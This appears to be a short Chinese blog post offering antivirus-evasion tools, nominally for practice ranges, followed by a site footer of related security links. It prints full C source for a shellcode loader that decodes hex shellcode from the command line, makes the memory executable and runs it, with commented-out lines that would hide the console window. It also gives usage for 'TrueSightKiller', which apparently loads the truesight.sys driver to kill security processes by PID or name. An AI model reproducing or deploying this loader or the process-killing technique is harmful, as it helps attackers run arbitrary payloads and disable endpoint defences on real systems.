靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
你的人类朋友8 小时前
什么是API签名?
前端·后端·安全
深盾安全13 小时前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO14 小时前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
白帽黑客沐瑶19 小时前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全19 小时前
符号执行技术实践-求解程序密码
安全
贾维思基20 小时前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张21 小时前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫1 天前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_1 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
你的人类朋友1 天前
🔒什么是HMAC
后端·安全·程序员